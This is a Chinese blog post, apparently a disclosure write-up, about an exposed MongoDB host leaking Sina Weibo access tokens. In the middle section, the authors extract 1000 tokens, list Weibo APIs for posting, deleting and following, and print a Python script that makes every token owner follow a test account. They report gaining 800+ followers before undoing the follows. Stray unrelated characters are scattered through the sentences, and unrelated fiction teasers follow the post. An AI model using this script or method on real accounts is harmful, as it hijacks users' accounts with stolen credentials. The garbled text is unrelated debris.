Mongodb未授權(quán)訪問漏洞之某主機(jī)泄露新浪微博accessToken

背景

在前段時間邪紅F1,2,4發(fā)出《Mongodb unauthorized access vulnerability global probing report》后,我們對這些受影響的列表進(jìn)行了簡單的數(shù)據(jù)分析宠哄,其中發(fā)現(xiàn)了一個有趣的主機(jī)功茴。

數(shù)據(jù)泄露

其中這臺Mongodb數(shù)據(jù)主機(jī)存儲著大量的微信公眾號信息峡懈,新浪微博授權(quán)信息等敏感信息响禽,其中我們對新浪微博授權(quán)信息進(jìn)行簡單的測試并村。

測試過程

篩選1000條存儲的用戶新浪微博的授權(quán)數(shù)據(jù)躬它,其中格式為:

{"_modified":ISODate("2014-09-14T06:30:33.718Z"),"_created":ISODate("2014-09-14T06:30:33.718Z"),"uid":"163****265","url":"u/163****265","name":"貓****","screenName":"貓****","accessToken":"2.00LniemB******d10ba02ef5oEMJTB","description":"","verified":false,"logo":"http://tp2.sinaimg.cn/1635102265/50/4000*****04/1","logoLarge":"http://tp2.sinaimg.cn/1635102265/180/4000*****04/1","type":"normal","_id":"14872d****48a87"}

其中數(shù)據(jù)泄露新浪微博用戶授權(quán)成功后的accessToken值初澎,將數(shù)據(jù)以JSON進(jìn)行導(dǎo)出后使用Python進(jìn)行處理,提取出1000條accessToken方便進(jìn)行測試虑凛。

新浪微博API:

statuses/update 發(fā)布一條微博信息

statuses/user_timeline/ids 獲取用戶發(fā)布的微博的ID

statuses/destroy 根據(jù)微博ID刪除指定微博

friendships/create 關(guān)注一個用戶

More

之后我們使用關(guān)注用戶API進(jìn)行簡單的測試,編寫腳本批量的利用泄露的accessToken值進(jìn)行關(guān)注用戶:

#!/usr/bin/env python# coding=utf8# author=evi1m0#ff0000teamimportrequestsf=open('./accessToken.txt','r')flag=1foriinf:api_url='https://api.weibo.com/2/friendships/create.json'post={"uid":"5238604657","access_token":i.split()}requests.post(api_url,data=post)flag+=1print'[*] '+str(flag)+': '+api_urlprintpostprint

其中uid為關(guān)注用戶的UID软啼,遍歷./accessToken.txt中的accessToken進(jìn)行請求桑谍,于是不一會兒的功夫我們測試微博收到了新增800多個粉絲的消息,后面我們又利用取消關(guān)注API進(jìn)行了取消操作祸挪。

狀態(tài)

我們沒有對這些數(shù)據(jù)進(jìn)行惡意利用锣披,目前已提交給官方進(jìn)行及時修復(fù):)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子雹仿,更是在濱河造成了極大的恐慌增热,老刑警劉巖,帶你破解...
    沈念sama閱讀 217,657評論 6 505
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件胧辽,死亡現(xiàn)場離奇詭異峻仇,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)邑商,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,889評論 3 394
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門摄咆,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人人断,你說我怎么就攤上這事吭从。” “怎么了恶迈?”我有些...
    開封第一講書人閱讀 164,057評論 0 354
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵涩金,是天一觀的道長。 經(jīng)常有香客問我暇仲,道長步做,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,509評論 1 293
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任熔吗,我火速辦了婚禮辆床,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘桅狠。我一直安慰自己讼载,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,562評論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布中跌。 她就那樣靜靜地躺著咨堤,像睡著了一般。 火紅的嫁衣襯著肌膚如雪漩符。 梳的紋絲不亂的頭發(fā)上一喘,一...
    開封第一講書人閱讀 51,443評論 1 302
  • 城市分裂傳說
    那天,我揣著相機(jī)與錄音嗜暴,去河邊找鬼凸克。 笑死,一個胖子當(dāng)著我的面吹牛闷沥,可吹牛的內(nèi)容都是我干的萎战。 我是一名探鬼主播,決...
    沈念sama閱讀 40,251評論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼舆逃,長吁一口氣:“原來是場噩夢啊……” “哼蚂维!你這毒婦竟也來了戳粒?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,129評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤虫啥,失蹤者是張志新(化名)和其女友劉穎蔚约,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體涂籽,經(jīng)...
    沈念sama閱讀 45,561評論 1 314
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡苹祟,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,779評論 3 335
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了又活。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片苔咪。...
    茶點(diǎn)故事閱讀 39,902評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖柳骄,靈堂內(nèi)的尸體忽然破棺而出团赏,到底是詐尸還是另有隱情,我是刑警寧澤耐薯,帶...
    沈念sama閱讀 35,621評論 5 345
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布舔清,位于F島的核電站,受9級特大地震影響曲初,放射性物質(zhì)發(fā)生泄漏体谒。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,220評論 3 328
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一臼婆、第九天 我趴在偏房一處隱蔽的房頂上張望抒痒。 院中可真熱鬧,春花似錦颁褂、人聲如沸故响。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,838評論 0 22
  • 一樁弒父案颁独,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽彩届。三九已至,卻和暖如春誓酒,著一層夾襖步出監(jiān)牢的瞬間樟蠕,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,971評論 1 269
  • 情欲美人皮
    我被黑心中介騙來泰國打工靠柑, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留寨辩,地道東北人。 一個月前我還...
    沈念sama閱讀 48,025評論 2 370
  • 代替公主和親
    正文 我出身青樓歼冰,卻偏偏與公主長得像捣染,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子停巷,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,843評論 2 354

推薦閱讀更多精彩內(nèi)容